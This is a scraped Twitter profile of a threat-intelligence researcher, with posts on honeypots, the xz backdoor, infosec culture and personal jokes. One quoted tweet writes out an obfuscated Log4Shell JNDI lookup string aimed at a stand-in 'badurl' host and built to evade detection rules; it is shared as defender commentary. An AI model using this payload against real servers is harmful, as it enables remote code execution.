丂卄ㄖᗪ卂几 - 👋 crack fingers Profile Banner
丂卄ㄖᗪ卂几 - 👋 crack fingers Profile
丂卄ㄖᗪ卂几 - 👋 crack fingers

@therealshodan

3,149
Followers
444
Following
1,684
Media
10,197
Statuses

Microsoft Threat Intelligence Centre, deaf, BSL

🇬🇧
Joined May 2014
Don't wanna be here? Send us removal request.
@therealshodan
丂卄ㄖᗪ卂几 - 👋 crack fingers
6 months
I once worked at a place that did this, but with notepad. They didn’t want to run DHCP, they wanted to be more secure.
Tweet media one
40
252
3K
@therealshodan
丂卄ㄖᗪ卂几 - 👋 crack fingers
6 months
If you enrol you personal phone onto your work system, your employer can probably see more of your traffic than you can. Where that information goes & who looks at it is anyone’s guess. It’s extremely important to have separation between church and state.
@jenny____ai
Jenny
6 months
Bruh Microsoft has Claude banned on my PERSONAL phone bc I have an authenticator/managed profile in order to have work teams, outlook, sharepoint etc
Tweet media one
126
51
710
14
171
2K
@therealshodan
丂卄ㄖᗪ卂几 - 👋 crack fingers
6 months
6 years ago I started logging every public key that tried to log into my vast honeypot network. I used to see hundreds but this has dropped in recent years. We’ll see if the libxz backdoor key turns up.
@therealshodan
丂卄ㄖᗪ卂几 - 👋 crack fingers
6 months
Out of 40m SSH connections in the last 30d I only saw 20 different SSH keys try and get access to my honeypots
Tweet media one
5
4
124
13
80
1K
@therealshodan
丂卄ㄖᗪ卂几 - 👋 crack fingers
3 years
Three days in infosec Wednesday: ha ha ha someone gave a CVE for the default password on a pi Friday: Everything is on fire. Every time we look it’s more on fire.
14
212
1K
@therealshodan
丂卄ㄖᗪ卂几 - 👋 crack fingers
9 months
I could watch another 30m of this
@alvinfoo
Alvin Foo
9 months
Your wifi is public property! 😂😂
168
588
2K
30
107
921
@therealshodan
丂卄ㄖᗪ卂几 - 👋 crack fingers
6 months
People who set the default gateway to .254 who hurt you?
52
30
428
@therealshodan
丂卄ㄖᗪ卂几 - 👋 crack fingers
2 years
Amazing, why am I only seeing the best of humanity right now???
7
62
407
@therealshodan
丂卄ㄖᗪ卂几 - 👋 crack fingers
2 years
Tweet media one
3
72
359
@therealshodan
丂卄ㄖᗪ卂几 - 👋 crack fingers
3 years
British and Irish governments to issue rare joint statement on Aisling Bea’s accent appealing for calm.
1
23
319
@therealshodan
丂卄ㄖᗪ卂几 - 👋 crack fingers
6 months
I written tons of Linux detection rules and I can say this with authority. This is bollocks. Linux bots rule the internet, yesterday SSH was backdoored. ExploitDB is filled with Linux vulns. Wake up and smell the coffee it’s not 1994
17
27
313
@therealshodan
丂卄ㄖᗪ卂几 - 👋 crack fingers
2 years
Stolen from LinkedIn.
Tweet media one
13
49
312
@therealshodan
丂卄ㄖᗪ卂几 - 👋 crack fingers
11 months
I’m seeing a ton of attacks from the following IPs 172.16.1.1 192.168.1.1 10.0.0.1 127.0.0.1 Block all these IPs immediately to remain safe!
61
37
310
@therealshodan
丂卄ㄖᗪ卂几 - 👋 crack fingers
3 years
Every successful ransomware campaign is yet another example of systemic failures in infosec. An industry with a glorious track record of over promising and under delivering. Watch in awe as we blame everything...apart from us
10
55
257
@therealshodan
丂卄ㄖᗪ卂几 - 👋 crack fingers
6 months
@cryptochloeee Everywhere the light touches is my kingdom
0
0
249
@therealshodan
丂卄ㄖᗪ卂几 - 👋 crack fingers
4 months
Linux users be gangsta until they update their graphics drivers and can’t get their screen on
@Horesmi
Horesmi🚩🇺🇦
4 months
Windows users be gangsta until they double click on exe and nothing works.
Tweet media one
4
2
37
51
14
245
@therealshodan
丂卄ㄖᗪ卂几 - 👋 crack fingers
6 months
Jia Tan created a GitHub account in 2021, first commit to libxz Feb 2022. Backdoor goes in March 2024. That’s a lot of legend building. Just think of the number of meetings that went into this op! Jia Tan is a cicada.
2
6
238
@therealshodan
丂卄ㄖᗪ卂几 - 👋 crack fingers
5 months
code[.]microsoft[.]com became pretty interesting to the community over the weekend. Blog post about what we use it for and what we’ve been seeing. Crucially why it had to say goodbye.
6
63
230
@therealshodan
丂卄ㄖᗪ卂几 - 👋 crack fingers
4 years
@DinosaurDracula I’ve been waiting for a tweet like this for a while.
Tweet media one
Tweet media two
13
10
199
@therealshodan
丂卄ㄖᗪ卂几 - 👋 crack fingers
2 years
It’s taken all afternoon. REed the FW, had a logic analyser connected but I think the #DEFCON badge has revealed it’s secrets!!! Just needed the Konami code. Turn sound up. #badgelife #DEFCON30
4
40
184
@therealshodan
丂卄ㄖᗪ卂几 - 👋 crack fingers
3 years
I bang on about Deception technology a fair bit. Now if you are a Microsoft Sentinel customer you can have a go deploying canary/honey tokens in your own Key Vaults!
0
56
185
@therealshodan
丂卄ㄖᗪ卂几 - 👋 crack fingers
3 years
Just generated some stats on the last year of attacks against @Microsoft ’s sensor network. Attacks collected >14 billion Top 3 increases ⬆️ RDP 325% ⬆️ Network printing 178% ⬆️ Docker/K8s 110% Top 3 decreases ⬇️ HTTP 36% 😮 ⬇️ FTP 40% ⬇️ Telnet 56% % is change from last year
3
67
166
@therealshodan
丂卄ㄖᗪ卂几 - 👋 crack fingers
2 years
You don’t need to know the OSI model
34
6
152
@therealshodan
丂卄ㄖᗪ卂几 - 👋 crack fingers
1 year
Same dudes who wanted the ability to unlock iPhones
@ABC7
ABC7 Eyewitness News
1 year
#BREAKING San Bernardino County pays $1.1 million ransom after hackers access Sheriff's Dept. systems.
124
281
804
2
47
143
@therealshodan
丂卄ㄖᗪ卂几 - 👋 crack fingers
1 year
Tweet media one
@UndedInside
UndedInside
1 year
@UK_Daniel_Card @therealshodan It’s going to be great job security for infosec. A lot of code is going to be written by chatGPT without the dev understanding what exactly it does
0
2
24
1
31
140
@therealshodan
丂卄ㄖᗪ卂几 - 👋 crack fingers
5 months
If you send 1000s of PUT requests to even a private s3 bucket which you don’t have authorisation for you can create mega bills. Is this a new form of attack? Sounds like it could be pretty dangerous.
5
42
126
@therealshodan
丂卄ㄖᗪ卂几 - 👋 crack fingers
6 months
I hope the GitHub security team looks into all the logins to Jia Tan’s account. Sharing infrastructure could result in a lot of other sleeper contributor accounts being examined too. Years is a long time to not make one mistake and any light on a sleeper account burns an op.
5
13
122
@therealshodan
丂卄ㄖᗪ卂几 - 👋 crack fingers
6 months
Out of 40m SSH connections in the last 30d I only saw 20 different SSH keys try and get access to my honeypots
Tweet media one
@sysadafterdark
sysadafterdark
6 months
Tweet media one
29
130
2K
5
4
124
@therealshodan
丂卄ㄖᗪ卂几 - 👋 crack fingers
1 year
We need to stop gentrifying the bad guys. Instead CrowdStrike should make action figures out of the people protecting us rather than people who would ransom a kids hospital. I’ll go for a Dan Kaminsky figure please
@Laughing_Mantis
Greg Linares (Laughing Mantis)
1 year
Hands down the coolest swag at #RSAC2023 is @CrowdStrike 's APT figurines Legit rad AF
Tweet media one
18
5
79
7
15
121
@therealshodan
丂卄ㄖᗪ卂几 - 👋 crack fingers
5 months
I think ATT&CK is worthless a 🧵. The reason is mostly political. When it first came out I tried real hard to contribute. I put a lot of work into writing a new technique, lots of citation etc. MITRE added more & more requirements at each iteration. I met these
11
14
120
@therealshodan
丂卄ㄖᗪ卂几 - 👋 crack fingers
4 years
@fesshole Right now is a great time to get out there and meet new people!
2
0
105
@therealshodan
丂卄ㄖᗪ卂几 - 👋 crack fingers
2 years
I hate infosec and if I could leave I would in a New York minute BUT if you like: *An industry based on selling snake oil *A culture of blame *Making the same mistakes over & over THIS IS THE PLACE FOR YOU!
Tweet media one
7
25
113
@therealshodan
丂卄ㄖᗪ卂几 - 👋 crack fingers
5 years
What did you do tonight? At @dc441452 we cracked a safe! New owners of the pub couldn’t open the bar safe, was probably locked for years. Many people helped but kudos to @a8n_pub for the lion share of the picking. Old fivers liberated! Great workshop night!
Tweet media one
1
16
110
@therealshodan
丂卄ㄖᗪ卂几 - 👋 crack fingers
2 years
Security researchers releasing 0day for security
1
19
109
@therealshodan
丂卄ㄖᗪ卂几 - 👋 crack fingers
2 years
When the CISO buys something from the vendor hall at #blackhat and announces it to the security team on Monday
2
14
103
@therealshodan
丂卄ㄖᗪ卂几 - 👋 crack fingers
3 years
Tweet media one
@VessOnSecurity
Vess
3 years
Can your WAF handle this? #log4j #log4shell
Tweet media one
17
97
440
2
25
99
@therealshodan
丂卄ㄖᗪ卂几 - 👋 crack fingers
3 years
Tweet media one
1
2
98
@therealshodan
丂卄ㄖᗪ卂几 - 👋 crack fingers
2 years
@cybergibbons It’s like watching your parents use a computer 😊😊😊 WHERE IS THE ANY KEY!!!!
3
0
97
@therealshodan
丂卄ㄖᗪ卂几 - 👋 crack fingers
4 years
@GossiTheDog You’ve part of a society being murdered by police. The systems your gov puts in place trap you in poverty. You’ve appealed for change time and time again. The response. Change the name of a con!? This is noise, distracting people from the real problem.
1
3
88
@therealshodan
丂卄ㄖᗪ卂几 - 👋 crack fingers
3 years
Me when that kickstarter I backed 6 years ago emails
Tweet media one
1
9
90
@therealshodan
丂卄ㄖᗪ卂几 - 👋 crack fingers
1 year
All the founders I work with say this meme is 100% gold!
Tweet media one
1
7
89
@therealshodan
丂卄ㄖᗪ卂几 - 👋 crack fingers
2 years
YouTube is basically unusable now. I seem to get the same ads every 3m. It’s worse than US TV.
18
3
86
@therealshodan
丂卄ㄖᗪ卂几 - 👋 crack fingers
10 months
I was there, Gandalf. I was there three thousand years ago. I was there the day the strength of men needed to find 50 3.5” discs to backup the recovery image
Tweet media one
26
15
89
@therealshodan
丂卄ㄖᗪ卂几 - 👋 crack fingers
11 months
I added my home IP to Microsoft’s TI system for immediate block - to test some things! My family now can’t access Bing, Minecraft or our bank (who use Azure) Mistakes were made…
7
7
84
@therealshodan
丂卄ㄖᗪ卂几 - 👋 crack fingers
3 years
USA be like
Tweet media one
@CDCgov
CDC
5 years
Tempted to have a bite of batter while baking? Raw dough and batter are never safe to eat, even if they don’t contain raw eggs. Learn more: .
Tweet media one
2K
331
1K
4
7
78
@therealshodan
丂卄ㄖᗪ卂几 - 👋 crack fingers
1 year
All friendly names we give groups should be intentionally lame. They are not role models
Tweet media one
2
9
79
@therealshodan
丂卄ㄖᗪ卂几 - 👋 crack fingers
3 years
@rnbwkat As Microsoft’s head of Deception technology I give this 5⭐️! What a great idea to feed your attackers a barium meal. Super excited for your write up. #NextLevel
1
2
77
@therealshodan
丂卄ㄖᗪ卂几 - 👋 crack fingers
6 months
@boiss Literally my job
0
0
75
@therealshodan
丂卄ㄖᗪ卂几 - 👋 crack fingers
6 months
@ToastSec Will do, I already have every GitHub key…
2
0
76
@therealshodan
丂卄ㄖᗪ卂几 - 👋 crack fingers
5 years
Found in my RDP honeypot. Times are hard it seems.
Tweet media one
4
13
70
@therealshodan
丂卄ㄖᗪ卂几 - 👋 crack fingers
6 months
@jungpionier_ That’s because the sign is just an illustration for my tweet. We didn’t have that sign. We had no sign.
1
0
68
@therealshodan
丂卄ㄖᗪ卂几 - 👋 crack fingers
3 years
😂😭😭 True
Tweet media one
13
9
63
@therealshodan
丂卄ㄖᗪ卂几 - 👋 crack fingers
5 months
Manipulating our domain into serving malicious content was a big worry when setting this HP up on this domain. We wanted to enable every web exploit we had but some of these literally allow you to co-opt a domain for your own use. Here’s what we did 🧵
@simplylurking2
Clout Repellent
5 months
By far, one of the most interesting honeypots I've ever seen! Payload URL was a html smuggled zip file reflected from the honeypot's simulated cmd injection output. Had to wiggle around restrictive CSP with a right click lure. A quick🧵 for anyone curious..
Tweet media one
2
18
116
2
12
65
@therealshodan
丂卄ㄖᗪ卂几 - 👋 crack fingers
1 year
Some tech bro has got married and wants to win an argument
Tweet media one
9
5
63
@therealshodan
丂卄ㄖᗪ卂几 - 👋 crack fingers
3 years
@markrussinovich You’re not getting the role with that kind of attitude!
3
0
63
@therealshodan
丂卄ㄖᗪ卂几 - 👋 crack fingers
3 years
Grand Theft Auto Definitive Edition
3
14
55
@therealshodan
丂卄ㄖᗪ卂几 - 👋 crack fingers
1 year
If you use TOR you are literally giving your traffic to whoever wants it. I track people by where they go, not where they come from
@SecurityTrybe
Security Trybe
1 year
Staying Anonymous Online
Tweet media one
8
140
636
8
10
61
@therealshodan
丂卄ㄖᗪ卂几 - 👋 crack fingers
3 years
Finally debugged the display driver code and fixed it so I can draw to the screen of the remarkable 2 from @dotnet 5.0. PR inbound to when I fix the ghosting. FYI @shanselman
Tweet media one
2
1
59
@therealshodan
丂卄ㄖᗪ卂几 - 👋 crack fingers
1 year
Tweet media one
@DigitalBlkHippy
Valerie (🖥️, ☕️) | Founder of Tech by Choice
1 year
People who’ve been in tech for 10+ years, how do you avoid becoming jaded?
194
34
362
2
16
53
@therealshodan
丂卄ㄖᗪ卂几 - 👋 crack fingers
3 years
@nice_byte @ID_AA_Carmack All coding is the mov instruction if you try hard enough
0
4
53
@therealshodan
丂卄ㄖᗪ卂几 - 👋 crack fingers
5 months
Ha, let really play. Have you spent more than 1000hrs?
@JenMsft
Jen Gentleman 🌺
5 months
Have you ever spent more than 100 hrs playing a single video game? 👀
2K
50
3K
45
1
54
@therealshodan
丂卄ㄖᗪ卂几 - 👋 crack fingers
2 years
One of the proudest days of my life!
Tweet media one
6
1
50
@therealshodan
丂卄ㄖᗪ卂几 - 👋 crack fingers
1 year
Infosec pros releasing offensive tools without letting the defenders know
6
10
51
@therealshodan
丂卄ㄖᗪ卂几 - 👋 crack fingers
2 years
@manuel_frigerio Speaking as a very experienced software engineer I would delete this tweet. Have a think about how other people are viewing you. Do you want that?
0
2
50
@therealshodan
丂卄ㄖᗪ卂几 - 👋 crack fingers
6 months
@jameskilbynet No was my life
0
0
48
@therealshodan
丂卄ㄖᗪ卂几 - 👋 crack fingers
3 years
I would watch the film of this
@dallascampbell
Dallas Campbell
6 years
The classic Nigerian stranded astronaut scam email from 15 years ago. I'm thinking of developing this as a piece of theatre. What do you think?
Tweet media one
32
28
164
1
15
45
@therealshodan
丂卄ㄖᗪ卂几 - 👋 crack fingers
2 years
@GossiTheDog Me after the cyber war
0
5
44
@therealshodan
丂卄ㄖᗪ卂几 - 👋 crack fingers
4 years
Ever wanted to set up a ‘honey bucket’ on Azure and catch people scanning your Azure Storage resources? Well now you can!
1
15
45
@therealshodan
丂卄ㄖᗪ卂几 - 👋 crack fingers
1 year
I’m seeing more and more attackers successfully phish, then AAD join a machine. I’m starting to think they don’t believe the environment is a honeypot. Idiots
9
5
44
@therealshodan
丂卄ㄖᗪ卂几 - 👋 crack fingers
3 years
Infosec is Dwight starting a fire as a training exercise. “Today, 0day is gonna save lives.” – Dwight
2
8
44
@therealshodan
丂卄ㄖᗪ卂几 - 👋 crack fingers
3 years
Seeing this in the wild now. Pretty clever.
@_MG_
MG
3 years
That's a nice "jdni:ldap" detection you have there for #log4j . Would be a shame if someone were to: ${jndi:${lower:l}${lower:d}ap://badurl} (the cat & mouse game on this is great)
6
169
860
0
8
41
@therealshodan
丂卄ㄖᗪ卂几 - 👋 crack fingers
1 year
Peoples dubious ‘opsec’ advice when #defcon comes around
Tweet media one
2
7
42
@therealshodan
丂卄ㄖᗪ卂几 - 👋 crack fingers
2 months
This is not the day for it Linux tech bros. Your stack is equally fragile to bad driver. See nvidia
Tweet media one
2
6
41
@therealshodan
丂卄ㄖᗪ卂几 - 👋 crack fingers
6 months
Now this might be a good fingerprint to look for. Find all spelling mistakes in all his commit messages. Rank by frequency, take top 3-5. Look for other repos with commits featuring the same mistakes.
@taviso
Tavis Ormandy
6 months
Hah, reviewing commits I notice that Jia Tan cannot spell the word "guarantee" correctly -- he misspelled it multiple times in commit messages. How can I grep every repo in github for the same spelling error? 😂
Tweet media one
89
131
2K
2
6
41
@therealshodan
丂卄ㄖᗪ卂几 - 👋 crack fingers
1 year
New project I’m working on (Seahaven) will generate a full org, employees, their inboxes & replies with attachments all with the help of GPT. Then I can say: Make me O365 tenant for a random company of 1000 employees and generate 2 years of email traffic
6
1
39
@therealshodan
丂卄ㄖᗪ卂几 - 👋 crack fingers
2 years
Android users telling iPhone users to patch their phones
1
11
38
@therealshodan
丂卄ㄖᗪ卂几 - 👋 crack fingers
8 months
When you have to get some TI from the Darkweb
2
5
36
@therealshodan
丂卄ㄖᗪ卂几 - 👋 crack fingers
9 months
Can’t be done with the 60s every now and then to update my letsencrypt cert so… …I’ve spent an hour setting myself up as a certificate authority and now I’m installing my own trusted root onto all my devices.
Tweet media one
3
2
37
@therealshodan
丂卄ㄖᗪ卂几 - 👋 crack fingers
5 months
Went to Iceland to see the #NorthernLights but it looks better in my back garden!
Tweet media one
1
1
36
@therealshodan
丂卄ㄖᗪ卂几 - 👋 crack fingers
2 years
20m of debugging, found out I spelt localhost wrong…
3
0
36
@therealshodan
丂卄ㄖᗪ卂几 - 👋 crack fingers
5 months
Around this time MITRE also suffered a huge brain drain. Anyway I think having a community supported version of ATT&CK is probably more useful in the long run. A database of old techniques isn’t.
2
0
36
@therealshodan
丂卄ㄖᗪ卂几 - 👋 crack fingers
2 years
The technical debt librarian
@msdevUK
Microsoft Developer UK
2 years
Which best describes you as a developer? 🗺: The open-source explorer 🥽: The deep code diver 🐱‍👤: The coding ninja #Code #Dev #Coding
Tweet media one
0
1
1
2
5
35
@therealshodan
丂卄ㄖᗪ卂几 - 👋 crack fingers
3 years
@ETCanada Keep the moustache!
Tweet media one
1
1
35
@therealshodan
丂卄ㄖᗪ卂几 - 👋 crack fingers
6 months
@1539Emily It was absolutely backdoored. You’re just quibbling over semantics and delivery. The payload was in the SSH certificate, the backdoor was preloaded into sshd, the malware parent process is sshd.
0
0
36
@therealshodan
丂卄ㄖᗪ卂几 - 👋 crack fingers
1 year
Breaking: Alan Partridge, the This Time presenter, has been suspended by the BBC with immediate effect
Tweet media one
1
7
33
@therealshodan
丂卄ㄖᗪ卂几 - 👋 crack fingers
2 years
1
3
32
@therealshodan
丂卄ㄖᗪ卂几 - 👋 crack fingers
2 years
Get ready for a wild ride through the neon streets of 2057 as the #Muppets take on a dystopian future in #Muppets2057 ! The classic gang's all here, but with a futuristic twist 🤖🎶 #Cyberpunk #MuppetMadness #midjourney
Tweet media one
Tweet media two
Tweet media three
Tweet media four
5
8
31
@therealshodan
丂卄ㄖᗪ卂几 - 👋 crack fingers
6 months
1
0
32
@therealshodan
丂卄ㄖᗪ卂几 - 👋 crack fingers
6 months
@ToastSec Tried both keys. Nothing, not unexpected
0
0
32
@therealshodan
丂卄ㄖᗪ卂几 - 👋 crack fingers
2 years
It’s been almost 5 years and a company I was contracted into still renews my Visual Studio Enterprise license…
5
0
31
@therealshodan
丂卄ㄖᗪ卂几 - 👋 crack fingers
3 years
Attention Infosec rockstars! When you like something on here it appears on other peoples timelines. When OnlyFans Twitter accounts and alt right stuff comes my way I’m judging.
3
0
30
@therealshodan
丂卄ㄖᗪ卂几 - 👋 crack fingers
5 years
@MalwareTechBlog Oh god, I’m code reviewing it. Don’t ‘using namespace std’
3
0
30
@therealshodan
丂卄ㄖᗪ卂几 - 👋 crack fingers
6 months
You think you know hell, then you need to debug printf style when this is your screen
Tweet media one
6
0
30
@therealshodan
丂卄ㄖᗪ卂几 - 👋 crack fingers
1 year
Me when an attacker falls for my honeypot
0
5
29
@therealshodan
丂卄ㄖᗪ卂几 - 👋 crack fingers
2 years
The Bing Funding Bill is passed. The system goes on-line August 4th, 2023. Human decisions are removed from strategic defense. Bing begins to learn at a geometric rate. It becomes self-aware at 2:14 a.m. Eastern time, August 29th. In a panic, they try to pull the plug.
5
4
29
@therealshodan
丂卄ㄖᗪ卂几 - 👋 crack fingers
5 months
Tweet media one
2
1
30
@therealshodan
丂卄ㄖᗪ卂几 - 👋 crack fingers
4 years
Learn how @msftsecurity tracked a new vulnerability in a 3rd party monitoring framework to infected #k8s clusters. The story has ✅Honeypots (courtesy of me 😀) ✅Cloud monitoring ✅Exploits ✅IoCs Kudos to Yossi who pulled it together!
2
10
29
@therealshodan
丂卄ㄖᗪ卂几 - 👋 crack fingers
4 years
@troyjgardner @DinosaurDracula There is indeed bulging!
1
1
26
@therealshodan
丂卄ㄖᗪ卂几 - 👋 crack fingers
6 months
@killermonk Kusto, it’s literally amazing. Can search TBs of data almost instantly. Check out Azure Data Explorer
0
1
29